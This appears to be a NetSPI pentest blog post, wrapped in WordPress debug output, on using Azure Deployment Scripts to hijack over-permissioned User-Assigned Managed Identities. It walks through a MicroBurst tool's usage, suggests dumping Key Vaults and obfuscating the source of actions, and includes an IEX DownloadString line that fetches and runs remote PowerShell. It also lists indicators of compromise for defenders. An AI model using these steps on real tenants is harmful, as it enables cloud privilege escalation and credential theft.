https://netspiblogdev.wpengine.com/?p=1207 [menu_order] => 799 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) ) [post_count] => 76 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 32110 [post_author] => 10 [post_date] => 2024-03-14 08:00:00 [post_date_gmt] => 2024-03-14 13:00:00 [post_content] =>

As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post - “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only get the role assignments that your authenticated user can read. There is potential that a Managed Identity has permissions in other subscriptions that you don’t have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but keep in mind that the identity may have roles in Subscriptions (or Management Groups) that you don’t have read permissions on.

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  1. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  1. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that you format your “-command” output in the parameter to ensure that your command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json”

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “–Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString(‘https://example.com/DeploymentExec.ps1’) |  Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation NameDescription
Microsoft.Resources/deployments/validate/actionValidate Deployment
Microsoft.Resources/deployments/writeCreate Deployment
Microsoft.Resources/deploymentScripts/writeWrite Deployment Script
Microsoft.Storage/storageAccounts/writeCreate/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/actionList Storage Account Keys
Microsoft.ContainerInstance/containerGroups/writeCreate/Update Container Group
Microsoft.Resources/deploymentScripts/deleteDelete Deployment Script
Microsoft.Resources/deployments/deleteDelete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

[post_title] => Azure Deployment Scripts: Assuming User-Assigned Managed Identities [post_excerpt] => Learn how to use Deployment Scripts to complete faster privilege escalation with Azure User-Assigned Managed Identities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-user-assigned-managed-identities-via-deployment-scripts [to_ping] => [pinged] => [post_modified] => 2024-03-14 10:26:46 [post_modified_gmt] => 2024-03-14 15:26:46 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=32110 [menu_order] => 2 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 76 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => ff7a562d56885bf9bbadb7bc34b4aa07 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
Azure Cloud Security Pentesting Skills
Karl Fosaaen
Intro to Cloud Penetration Testing
Karl Fosaaen

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X